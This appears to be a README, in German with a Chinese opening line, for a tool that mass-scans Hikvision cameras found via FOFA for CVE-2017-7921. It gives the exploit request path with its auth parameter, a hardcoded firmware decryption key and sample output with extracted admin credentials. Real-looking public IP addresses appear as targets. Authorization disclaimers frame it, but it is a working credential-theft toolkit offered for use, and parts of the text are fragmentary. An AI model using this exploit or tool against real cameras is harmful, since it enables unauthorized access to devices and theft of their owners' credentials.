
用于借助FOFA快速测试海康威视的CVE-2017-7921漏洞,并且给出登陆账号和密码,并输出json文件。
Sicherheitshinweis: Dieses Tool ist nur für autorisierte Sicherheitsforschung und Schwachstellenüberprüfung bestimmt
Wichtiger Hinweis: Mit der Nutzung dieses Tools stimmen Sie den folgenden Bedingungen zu
Dieses Projekt folgt der GitHub-Richtlinie zur Sicherheitsforschung und den Offenlegungsstandards des Hikvision Security Response Centers.
Ein Massendetektions- und Verifizierungstool für die Authentifizierungsbypass-Schwachstelle CVE-2017-7921 in Hikvision-IP-Kameras, das automatische Entschlüsselung von Konfigurationsdateien und Extraktion von Anmeldeinformationen unterstützt.
git clone https://github.com/[你的用户名]/CVE-2017-7921-Research-Toolkit.git
cd CVE-2017-7921-Research-Toolkit
pip install -r requirements.txt
requests>=2.28.0
pycryptodome>=3.15.0
tqdm>=4.64.0
Erstellen Sie im Tool-Verzeichnis den Ordner zc/ und legen Sie die Geräteliste im JSON-Format darin ab (ein Geräteobjekt pro Zeile):
mkdir zc
Beispieldatei: devices_2025.json
{"city":"Lisbon","country":"PT","host":"109.50.152.186","link":"http://109.50.152.186:80"}
{"city":"Sao Paulo","country":"BR","host":"200.201.192.75","link":"http://200.201.192.75:8080"}
Felderklärung:
python batch_decrypt.py
════════════════════════════════════════════════════════════════════════════════
Massenscan-Tool für Konfigurationsdatei-Schwachstellen von Hikvision-Kameras
════════════════════════════════════════════════════════════════════════════════
Verfügbare JSON-Dateien:
════════════════════════════════════════════════════════════════════════════════
1. devices_2025.json (45,678 Bytes)
════════════════════════════════════════════════════════════════════════════════
Bitte wählen Sie eine Dateinummer: 1
Ausgewählte Datei: devices_2025.json
Lade Gerätedaten...
Gesamtanzahl zu scannender Geräte: 2000
Bitte Anzahl gleichzeitiger Threads eingeben (Standard: 5): 10
Anzahl Threads: 10
Scan starten...
Gesamtanzahl gescannter Geräte: 2000
Anzahl verwundbarer Geräte gefunden: 127
Verwundbare Geräte gespeichert unter: vulnerable_devices.json
Nach Abschluss des Scans wird vulnerable_devices.json erstellt, das alle Informationen über verwundbare Geräte enthält.
Beispielausgabe:
[
{
"url": "http://109.50.152.186",
"config_url": "http://109.50.152.186/System/configurationFile?auth=YWRtaW46MTEK",
"username": "admin",
"password": "123456",
"city": "Lisbon",
"country": "PT",
"org": "ISP Telecom",
"status": "success"
}
]
/System/configurationFile?auth=YWRtaW46MTEK verwendet hartcodierte Anmeldeinformationen.279977f62f6cfd2d91cd75b889ce0c9a ist fest in der Firmware codiert.0x73, 0x8B, 0x55, 0x44)Diese Software ist nur für autorisierte Sicherheitsforschung und Bildungszwecke bestimmt. Der Benutzer ist selbst dafür verantwortlich, die Einhaltung aller geltenden Gesetze sicherzustellen.
Letzte Aktualisierung: 2025-01-29 | Version: v1.0.0 | Unterstützt CVE: CVE-2017-7921
| Feld | Beschreibung | Erforderlich |
|---|
link | HTTP/HTTPS-Zugriffsadresse des Geräts | ✅ Ja |
city | Stadtinformation | ❌ Nein |
country | Ländercode | ❌ Nein |
org | Organisation/ISP-Information | ❌ Nein |